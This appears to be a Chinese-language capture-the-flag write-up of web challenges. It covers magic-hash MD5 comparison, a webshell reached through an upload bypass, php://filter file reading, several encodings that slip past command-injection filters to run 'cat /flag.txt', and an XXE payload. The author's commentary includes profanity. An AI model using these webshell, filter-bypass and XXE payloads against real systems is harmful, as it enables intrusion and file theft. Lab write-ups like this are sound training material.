扫扫看
不用扫,猜测是flag.php
flag{094c9cc14068a7d18ccd0dd3606e532f}
debudao
flag在cookie里:
flag{72077a55w312584wb1aaa88888cd41af}
审计
1 |
|
根据题意,我们需要输入纯数字进去,然后md5加密后是0e+数字的组合。
240610708的md5加密后是0e462097431906509019562988736854
所以输入xss=240610708即可
flag{1bc29b36f623ba82aaf6724fd3b16718}
upload1
是前端检测,抓包传
进入123.php post传参:123=system(“cat /flag.txt”);
flag{adbf5a778175ee757c34d0eba4e932bc}
Dragon
还是在cookie里,什么了色题?
flag{72077a551386b19fb1aea77814cd41af}
tnl
真傻逼,这题目输入3会报sql的错,但是这道题跟sql一点关系也没有,看wp才知道是普通的伪协议读文件他妈的真的
我说我怎么输,都会报twothree’的错草
源码:
1 |
|
真傻逼
1 | twothree=php://filter/convert.base64-encode/index/resource=flag |
flag{29dba9019e40d75a5053b15f4f2906e1}
你知道sys还能这样玩吗
好家伙,开局403怼脸,来者不善,啥都没给,先猜,结果在sys.php有东西
1 |
|
就过滤了普通一些特定组合命令,这里因为直接执行系统命令,可以用bash的做法做,我这里使用变量拼接:
1 | ls / |
看到根目录有flag.txt,但是这里把*
?
.
都过滤了,但是中括号还没有,可以用中括号的通配符:
1 | cat /flag[^a]txt |
flag{196b0f14eba66e10fba74dbf9e99c22f}
法二:
利用php -r 执行php代码,编码绕过
1 | cmd=php -r 'system(hex2bin("636174202f666c61672e747874"));' |
不用双引号的版本:
1 | cmd=php -r 'system(hex2bin(ff3b636174202f666c61672e747874));' |
法三:
printf和双引号绕过base64加密
1 | cmd=`printf "Y2F0IC9mbGFnLnR4dA=="|bas""e64 -d` |
法四:
八进制转化
1 | cmd=$%27\143\141\164%27%3c$%27\57\146\154\141\147\56\164\170\164%27 |
ExX
扫后台扫到了dom.php
报错有 DOMDocument::loadXML()
结合题目名字,猜测是xxe实体注入
直接上payload
1 | <xml><name>&xxe;</name></xml> |
PD9waHANCi8vZmxhZ3s3ZTk3ZThjNGY5ZDZiZTM1YWU4NTAwYjlmYjJjZGQzZX0NCg==
flag{7e97e8c4f9d6be35ae8500b9fb2cdd3e}
然后困难部分就全是java了=-=
CC链
cc6链,不出网打内存马